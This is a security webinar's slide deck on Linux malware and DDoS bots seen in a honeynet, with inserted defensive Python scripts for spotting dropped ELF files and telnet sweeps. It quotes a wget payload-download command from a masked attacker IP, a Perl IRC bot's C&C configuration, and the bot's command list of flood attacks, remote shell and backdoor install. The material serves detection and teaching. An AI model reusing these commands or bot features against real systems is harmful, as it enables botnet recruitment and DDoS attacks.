
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and DDoS Agent



APNIC's Senior Security Specialist Adli Wahid gave a presentation on Linux malware, DDoS agents and bots, based on observations from the Honeynet project at the IX 2020 – Internet Security and Mitigation of Risk Webinar, held online on 15 June 2020.



Slide 1: Linux Malware and DDoS Agent
Adli Wahid, Senior Internet Security Specialist, APNIC
Slide 2: Let's Connect!
  • Email: adli@apnic.net
  • LinkedIn: Adli Wahid
  • Twitter: @adliwahid
  (Photo: https://unsplash.com/photos/8ZxiJ03e5S4)
Slide 3: Plan & Objectives
  1. Share a different perspective on DDoS
  2. Talk about DDoS agents / Linux malware
  3. Observations from our Community Honeynet Project
Slide 4: Different Perspective of DDoS
  [Diagram: "My Network / Infrastructure / Host" seen from two sides: as the Source (Attacker Perspective) and as the Target / Victim (Victim Perspective)]
Slide 5: Victim / Target Perspective
  • Availability affected
    o System down
    o Critical or not (what is affected?)
  • Priority
    o Business as usual
    o Services not disrupted
  • Increase preparedness (or do nothing)
    – Detection
    – Incident Response
    – Mitigation
  • Investigation
    – Actor
    – Motive
    – Attacker infrastructure
  Source: https://www.shadowserver.org/news/mirai-botnet-14-1-million-german-customers-disrupted-liberia-taken-off-line-and-now-the-culprit-has-been-convicted/
Slide 6: Source of Attack Perspective
  • How is the attack organized?
    o We tend to see pieces of the puzzle (netflow, front-end)
  • How do attackers build their attacking infrastructure?
    – What tools are used?
  • Can we identify the attacker's infrastructure?
  • Are we part of the attacker's infrastructure?
    – Can we detect or prevent this?
  • Are we contributing to the DDoS problem?
Slide 7: Tools & Techniques
  • Techniques
    – Misconfigured services used for amplification attacks
      o DNS, SSDP, NTP, Chargen etc.
    – Recruiting servers & IoT devices as bots
      • Exploit known system vulnerabilities
      • Exploit weak/default credentials (i.e. ssh / telnet) + misconfiguration
  • Use of Malware
    – We hear more about Windows
    – Targeting Linux servers and IoT devices to infect the device
    – ELF binaries or scripts (perl, bash, php etc.)
    – Device will receive instructions to attack
Slide 8: Vulnerable services, Mongolia
  • Data from the Cyber Green Project: https://stats.cybergreen.net/country/mongolia/
  • Challenge: how to deal with misconfiguration of these services?
  [Chart: DDoS potential of Open SNMP, Open DNS and Open NTP services in Mongolia]
Slide 9: Get reports about your network
  • Shadowserver Foundation
    o https://www.shadowserver.org/what-we-do/network-reporting/get-reports/
  • CyberGreen
    – Download data: https://stats.cybergreen.net/download/
  • Do it yourself
    – Scan (Nmap)
    – Use a service such as Shodan.io
Slide 10: Linux/Unix Malware
  • Routers / IoT devices / servers run Linux / Unix based OS
  • Not new but interesting
    – Targets are exposed on the Internet (http, telnet, 23)
    – Unpatched / unmonitored (i.e. no anti-virus)
    – Default/weak credentials
  • Popular example: Mirai (DDoS agent)
    – Source code was shared publicly
  • Simple technique of infecting, spreading & persistence
Slide 11: Bot "recruitment" process
  [Diagram: (1) Attacker gains access to the device, either by brute force (Username: admin, password: 12345) or by remote code execution via the web interface. (2) The device downloads and executes the binary, e.g. wget http://37.x.2x.190:80/13747243572475/hx86_64. The bot then scans and gains access to further devices and connects to the Command and Control (C&C) server.]
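The last step of the chain above is a binary dropped into a writable directory and executed, so a responder's first host-side question is "what ELF files are sitting in the drop directories?". The following script is an added example (not part of the presentation or APNIC's tooling): it walks a set of directories, recognises ELF files by their magic bytes rather than by name or extension, and decodes class, endianness, type and target architecture from the ELF header so an x86-64 server payload can be told apart from an ARM or MIPS IoT payload. The sample files it scans are constructed in a temporary directory; the drop-directory list in the usage section is an assumption.

```python
"""Host-side triage for dropped ELF binaries (added example, constructed fixtures)."""
import os
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
# e_machine and e_type values from the ELF specification (subset)
E_MACHINE = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared-object", 4: "core"}


def parse_elf_header(data):
    """Return a dict describing the ELF identification header, or None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]          # 1 = 32-bit / 2 = 64-bit; 1 = LE / 2 = BE
    endian = {1: "<", 2: ">"}.get(ei_data)
    if endian is None or ei_class not in (1, 2):
        return None                               # malformed ident bytes
    # e_type and e_machine are the two 16-bit fields right after the 16-byte e_ident
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "class": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": E_TYPE.get(e_type, "unknown(%d)" % e_type),
        "machine": E_MACHINE.get(e_machine, "unknown(%d)" % e_machine),
    }


def find_elf_files(roots):
    """Walk `roots` and return a sorted list of (path, header_info) for every ELF file."""
    found = []
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(64)        # the ELF header fits in 64 bytes
                except OSError:
                    continue                      # unreadable or already deleted
                info = parse_elf_header(head)
                if info:
                    found.append((path, info))
    return sorted(found)


def make_sample_dir():
    """Constructed fixtures: two minimal ELF headers and two non-ELF files."""
    d = tempfile.mkdtemp(prefix="elf-triage-")
    # 64-bit little-endian x86-64 executable: magic, class=2, data=1, version=1, pad, e_type=2, e_machine=62
    x86_64 = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, 62) + b"\x00" * 44
    # 32-bit big-endian MIPS executable, the shape of a typical router payload
    mips_be = ELF_MAGIC + b"\x01\x02\x01" + b"\x00" * 9 + struct.pack(">HH", 2, 8) + b"\x00" * 44
    samples = {
        "hx86_64": x86_64,
        ".x": mips_be,                            # hidden and extension-less: the name tells you nothing
        "update.sh": b"#!/bin/sh\necho not a binary\n",
        "notes.txt": b"just text\n",
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    # Assumption: the usual world-writable drop directories on a Linux host.
    roots = [make_sample_dir(), "/tmp", "/var/tmp", "/dev/shm"]
    for path, info in find_elf_files(roots):
        print("%s  %d-bit %s-endian %s for %s" % (path, info["class"], info["endian"], info["type"], info["machine"]))
```

Only the ELF identification header is parsed; a stripped or UPX-packed sample still shows up because the magic bytes and e_machine survive packing of the sections. Extend the `roots` list with whatever directory the bot's own configuration names (the Perl bot on the next slide uses /tmp as its home directory).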
Slide 12: Perl Bot (configuration section of an IRC-controlled Perl DDoS bot, as captured by the honeynet)

    my $process = $rps[rand scalar @rps];          # process name to masquerade as (picked from @rps)
    my @rversion = ("Phl4nk");
    my $vers = $rversion[rand scalar @rversion];
    my @rircname = ("zombie");
    my $ircname = $rircname[rand scalar @rircname];
    chop (my $realname = $rircname[rand scalar @rircname]);
    my $nick = $rircname[rand scalar @rircname];   # IRC nickname the bot joins with
    my $server = '125.x.y.z';                      # C&C IRC server (address masked on the slide)
    my $port = '1947';                             # non-standard IRC port
    my $linas_max = '8';
    my $sleep = '5';
    my $homedir = "/tmp";                          # working directory the bot drops into
    my $version = 'v.02';
    my @admins = ("Nite","NiteMax","Nite123");     # IRC nicks allowed to issue commands
    #my @hostauth = ("Nite");
    my @channels = ("#VPS");                       # C&C channel
Slide 13: Source code (help text embedded in the bot)

    Non-spoof / non-root attacks: (can run on all bots)
    STD <ip> <port> <time> = A non spoof UDP HIV STD flooder
    HOLD <host> <port> <time> = A vanilla TCP connection flooder
    JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
    UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
    HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder

    Spoof / root attacks:
    DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
    BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.

    Bot commands:
    AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically.
    GETIP <iface> = gets the IP address from an interface
    FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
    RNDNICK = Randomizes knight nickname
    NICK <nick> = Changes the nick of the client
    SERVER <server> = Changes servers
    GETSPOOFS = Gets the current spoofing
    SPOOFS <subnet> = Changes spoofing to a subnet
    DISABLE = Disables all packeting from the knight
    ENABLE = Enables all packeting from the knight
    KILL = Kills the knight
    GET <http address> <save as> = Downloads a file off the web
    VERSION = Requests version of knight
    KILLALL = Kills all current packeting
    HELP = Displays this
    IRC <command> = Sends this command to the server
    SH <command> = Executes a command
    BASH <command> = Run a bash command
    ISH <command> = Interactive SH (via privmsg)
    SHD <command> = Daemonize command
    INSTALL <http://server/bin> = Install binary (via wget)
    BINUPDATE <http://server/bin> = Update a binary (via wget)
    LOCKUP <http://server/bin> = Kill telnet, install a backdoor!
Slide 14: Preventing Infection
  • Know your assets & customers
    – Get reports from Shadowserver, CyberGreen
    – Use tools (nmap) or services like Shodan.io
    – Awareness of vulnerabilities & active exploitation
  • Secure / harden Linux & IoT devices
    o Access control to services (brute force)
    o Remove / harden services: DNS resolver, NTP, etc.
    o Patch & upgrade
  Resources: https://otx.alienvault.net, www.virustotal.com
Slide 15: Detection
  • Network based detection
    – Policy: downloading of ELF / binary with certain user agents
    – Brute force / telnet related activities
  • Network Security Monitoring
    – Netflow
    – IDS/NSM: Zeek, Suricata
    – Honeypots
  • Awareness of threat landscape
    – Go deep into malware research & analysis
    – Collaborate & share information: C&C, infected hosts
  • Forensics*
  [Figure: Detection with Suricata rulesets, Fbot, Community Honeynet Project (2019); see https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html]
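The two network-based policies on this slide (binary downloads with a scripted user agent, and telnet brute-force or scanning activity) are simple enough to express as a few lines over NSM logs. The script below is an added example written for this page, not code from the presentation or from the Zeek or Suricata projects: it runs both checks over constructed log records whose field names follow the JSON form of Zeek's http.log and conn.log (an assumption; adjust the keys to your sensor's output). The user-agent prefixes, the ports and the window/threshold values are assumptions to be tuned locally.

```python
"""Network-based detection over constructed Zeek-style JSON log records (added example)."""
import ipaddress
import json
import re
from collections import defaultdict

SCRIPTED_UA_PREFIXES = ("wget", "curl", "python")   # assumption: fetchers bots typically use
ELF_MIME = "application/x-executable"                # MIME label Zeek assigns to ELF bodies
TELNET_PORTS = {23, 2323}

# Constructed http.log records: two payload fetches and two benign downloads.
HTTP_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": 1592211600.1, "id.orig_h": "10.0.0.5", "id.resp_h": "203.0.113.7",
     "method": "GET", "host": "203.0.113.7", "uri": "/bins/hx86_64",
     "user_agent": "Wget/1.20.3 (linux-gnu)", "resp_mime_types": [ELF_MIME]},
    {"ts": 1592211601.4, "id.orig_h": "10.0.0.6", "id.resp_h": "93.184.216.34",
     "method": "GET", "host": "www.example.com", "uri": "/index.html",
     "user_agent": "Mozilla/5.0", "resp_mime_types": ["text/html"]},
    {"ts": 1592211602.0, "id.orig_h": "10.0.0.7", "id.resp_h": "203.0.113.9",
     "method": "GET", "host": "203.0.113.9:80", "uri": "/bins/mips",
     "user_agent": "-", "resp_mime_types": [ELF_MIME]},
    {"ts": 1592211603.2, "id.orig_h": "10.0.0.8", "id.resp_h": "93.184.216.34",
     "method": "GET", "host": "mirror.example.com", "uri": "/pool/curl_amd64.deb",
     "user_agent": "Debian APT-HTTP/1.3",
     "resp_mime_types": ["application/vnd.debian.binary-package"]},
])


def _build_conn_log():
    """Constructed conn.log: one source sweeps twelve hosts on tcp/23, one probes tcp/2323 three times."""
    recs = []
    for i in range(12):
        recs.append({"ts": 1592211700.0 + 2 * i, "id.orig_h": "192.0.2.10", "id.resp_h": "10.0.0.%d" % (20 + i),
                     "id.resp_p": 23, "proto": "tcp", "conn_state": "REJ"})
    for i in range(3):
        recs.append({"ts": 1592211700.0 + 10 * i, "id.orig_h": "198.51.100.4", "id.resp_h": "10.0.0.30",
                     "id.resp_p": 2323, "proto": "tcp", "conn_state": "S0"})
    recs.append({"ts": 1592211705.0, "id.orig_h": "10.0.0.6", "id.resp_h": "10.0.0.1",
                 "id.resp_p": 22, "proto": "tcp", "conn_state": "SF"})   # ordinary admin SSH session
    return "\n".join(json.dumps(r) for r in recs)


CONN_LOG = _build_conn_log()


def _records(lines):
    for line in lines.splitlines():
        if line.strip():
            yield json.loads(line)


def is_ip_literal(host):
    """True if the Host header is a bare IP address; handles IPv4:port, not bracketed IPv6:port."""
    if host.count(":") == 1:
        host = re.sub(r":\d+$", "", host)
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def flag_elf_downloads(lines):
    """One hit per ELF download, listing the traits that make it look like a bot payload fetch."""
    hits = []
    for rec in _records(lines):
        if ELF_MIME not in (rec.get("resp_mime_types") or []):
            continue
        ua = (rec.get("user_agent") or "-").lower()
        reasons = ["elf-download"]
        if ua == "-" or ua.startswith(SCRIPTED_UA_PREFIXES):
            reasons.append("scripted-user-agent")
        if is_ip_literal(rec.get("host", "")):
            reasons.append("ip-literal-host")
        hits.append({"src": rec["id.orig_h"], "url": "http://%s%s" % (rec["host"], rec["uri"]),
                     "reasons": reasons, "score": len(reasons)})
    return hits


def flag_telnet_scanners(lines, threshold=10, window=60.0):
    """Sources with at least `threshold` telnet connections inside any `window` seconds."""
    per_src = defaultdict(list)
    for rec in _records(lines):
        if rec.get("proto") == "tcp" and rec.get("id.resp_p") in TELNET_PORTS:
            per_src[rec["id.orig_h"]].append(float(rec["ts"]))
    alerts = []
    for src, stamps in per_src.items():
        stamps.sort()
        best, j = 0, 0
        for i in range(len(stamps)):            # sliding window over sorted timestamps
            while stamps[i] - stamps[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts.append({"src": src, "telnet_connections_in_window": best})
    return sorted(alerts, key=lambda a: a["src"])


if __name__ == "__main__":
    for h in flag_elf_downloads(HTTP_LOG):
        print("ELF download  src=%s url=%s score=%d (%s)" % (h["src"], h["url"], h["score"], ", ".join(h["reasons"])))
    for a in flag_telnet_scanners(CONN_LOG):
        print("telnet sweep  src=%s connections=%d" % (a["src"], a["telnet_connections_in_window"]))
```

The score is deliberately additive: an ELF fetched by a browser from a package mirror scores 1 and is worth a glance, while an ELF fetched by wget (or with no user agent at all) from a bare IP scores 3 and matches the recruitment step on slide 11 almost exactly. The telnet check counts connection attempts regardless of outcome, so a sweep that is mostly rejected (conn_state REJ or S0) is still caught; on a busy IoT network start with a higher threshold and lower it as you learn the baseline.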
Slide 16: More information
  • APNIC blog: https://blog.apnic.net
  • APNIC Academy: https://academy.apnic.net
Slide 17: Thank You!
  o Email: adli@apnic.net
  o LinkedIn: Adli Wahid
  o Twitter: @adliwahid
  (Photo: https://unsplash.com/photos/foJms49Rrwc)
